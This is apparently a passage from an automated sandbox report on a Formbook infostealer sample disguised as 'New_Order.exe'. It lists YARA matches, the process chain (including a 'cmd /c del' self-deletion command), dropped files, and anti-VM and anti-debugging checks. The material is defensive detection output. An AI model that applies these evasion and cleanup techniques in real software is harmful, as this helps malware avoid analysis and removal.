Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952581	1_2_03952581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F25DD	1_2_039F25DD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393D5E0	1_2_0393D5E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F2D07	1_2_039F2D07
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03920D20	1_2_03920D20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F1D55	1_2_039F1D55
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393841F	1_2_0393841F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039ED466	1_2_039ED466
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487B090	7_2_0487B090
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048920A0	7_2_048920A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_049320A8	7_2_049320A8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04921002	7_2_04921002
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487841F	7_2_0487841F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04892581	7_2_04892581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0487D5E0	7_2_0487D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0486F900	7_2_0486F900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04932D07	7_2_04932D07
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04860D20	7_2_04860D20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04884120	7_2_04884120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04931D55	7_2_04931D55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_049322AE	7_2_049322AE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04932EF7	7_2_04932EF7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04886E30	7_2_04886E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0489EBB0	7_2_0489EBB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04931FF1	7_2_04931FF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_04932B28	7_2_04932B28
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062BA5D	7_2_0062BA5D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062C34C	7_2_0062C34C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00618C60	7_2_00618C60
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062B4A3	7_2_0062B4A3
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00612D90	7_2_00612D90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00612FB0	7_2_00612FB0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0392B150 appears 48 times
Source: C:\Windows\SysWOW64\wscript.exe	Code function: String function: 0486B150 appears 35 times

PE file contains strange resources

Source: New_Order.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: New_Order.exe, 00000000.00000003.233299812.0000000002C3F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs New_Order.exe
Source: New_Order.exe, 00000000.00000002.240312486.0000000002480000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs New_Order.exe

Uses 32bit PE files

Source: New_Order.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/3@13/8

Source: C:\Users\user\Desktop\New_Order.exe

0_2_00403348

Source: C:\Users\user\Desktop\New_Order.exe

Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040460D

Source: C:\Users\user\Desktop\New_Order.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01

Source: C:\Users\user\Desktop\New_Order.exe

File created: C:\Users\user\AppData\Local\Temp\nsmC33E.tmp

Jump to behavior

Source: New_Order.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\New_Order.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\New_Order.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: New_Order.exe	Virustotal: Detection: 38%
Source: New_Order.exe	ReversingLabs: Detection: 59%

Source: C:\Users\user\Desktop\New_Order.exe

File read: C:\Users\user\Desktop\New_Order.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\New_Order.exe 'C:\Users\user\Desktop\New_Order.exe'
Source: C:\Users\user\Desktop\New_Order.exe	Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\New_Order.exe	Process created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'	Jump to behavior

Source: C:\Users\user\Desktop\New_Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: New_Order.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
Source:	Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source:	Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source:	Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00410109 push eax; iretd	1_2_0041010B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041A2F2 push es; ret	1_2_0041A337
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00415BFC push ss; ret	1_2_00415BFD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041B3B5 push eax; ret	1_2_0041B408
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041B46C push eax; ret	1_2_0041B472
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041B402 push eax; ret	1_2_0041B408
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041B40B push eax; ret	1_2_0041B472
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004154D4 push ss; iretd	1_2_004154DC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00413E26 pushfd ; iretd	1_2_00413E27
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00414EC1 push es; retf	1_2_00414EC2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0397D0D1 push ecx; ret	1_2_0397D0E4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048BD0D1 push ecx; ret	7_2_048BD0E4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00620109 push eax; iretd	7_2_0062010B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062A2F2 push es; ret	7_2_0062A337
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00625BFC push ss; ret	7_2_00625BFD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062B3B5 push eax; ret	7_2_0062B408
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062B46C push eax; ret	7_2_0062B472
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062B402 push eax; ret	7_2_0062B408
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062B40B push eax; ret	7_2_0062B472
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_006254D4 push ss; iretd	7_2_006254DC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00623E26 pushfd ; iretd	7_2_00623E27
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00624EC1 push es; retf	7_2_00624EC2

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\Desktop\New_Order.exe

File created: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll

Jump to dropped file

Source: C:\Users\user\Desktop\New_Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 00000000006185E4 second address: 00000000006185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 000000000061897E second address: 0000000000618984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\New_Order.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_004088B0 rdtsc

1_2_004088B0

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 5048	Thread sleep time: -45000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 6240	Thread sleep time: -44000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wscript.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,		0_2_0040646B
Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		0_2_004058BF

Source: explorer.exe, 00000002.00000000.258112198.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.244873438.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000002.501665466.0000000003767000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000002.496335851.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000002.507902104.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_004088B0 rdtsc

1_2_004088B0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00409B20 LdrLoadDll,

1_2_00409B20

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]	0_2_10001000
Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_024D1790 mov eax, dword ptr fs:[00000030h]	0_2_024D1790
Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_024D19A8 mov eax, dword ptr fs:[00000030h]	0_2_024D19A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952397 mov eax, dword ptr fs:[00000030h]	1_2_03952397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395B390 mov eax, dword ptr fs:[00000030h]	1_2_0395B390
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E138A mov eax, dword ptr fs:[00000030h]	1_2_039E138A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03931B8F mov eax, dword ptr fs:[00000030h]	1_2_03931B8F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03931B8F mov eax, dword ptr fs:[00000030h]	1_2_03931B8F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DD380 mov ecx, dword ptr fs:[00000030h]	1_2_039DD380
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]	1_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]	1_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]	1_2_03954BAD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F5BA5 mov eax, dword ptr fs:[00000030h]	1_2_039F5BA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h]	1_2_039A53CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h]	1_2_039A53CA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]	1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]	1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]	1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]	1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]	1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]	1_2_039503E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394DBE9 mov eax, dword ptr fs:[00000030h]	1_2_0394DBE9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E131B mov eax, dword ptr fs:[00000030h]	1_2_039E131B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F8B58 mov eax, dword ptr fs:[00000030h]	1_2_039F8B58
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392F358 mov eax, dword ptr fs:[00000030h]	1_2_0392F358
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392DB40 mov eax, dword ptr fs:[00000030h]	1_2_0392DB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h]	1_2_03953B7A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h]	1_2_03953B7A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392DB60 mov ecx, dword ptr fs:[00000030h]	1_2_0392DB60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h]	1_2_0395D294
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h]	1_2_0395D294
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0393AAB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h]	1_2_0393AAB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395FAB0 mov eax, dword ptr fs:[00000030h]	1_2_0395FAB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]	1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]	1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]	1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]	1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]	1_2_039252A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952ACB mov eax, dword ptr fs:[00000030h]	1_2_03952ACB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952AE4 mov eax, dword ptr fs:[00000030h]	1_2_03952AE4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]	1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03925210 mov ecx, dword ptr fs:[00000030h]	1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]	1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]	1_2_03925210
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h]	1_2_0392AA16
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h]	1_2_0392AA16
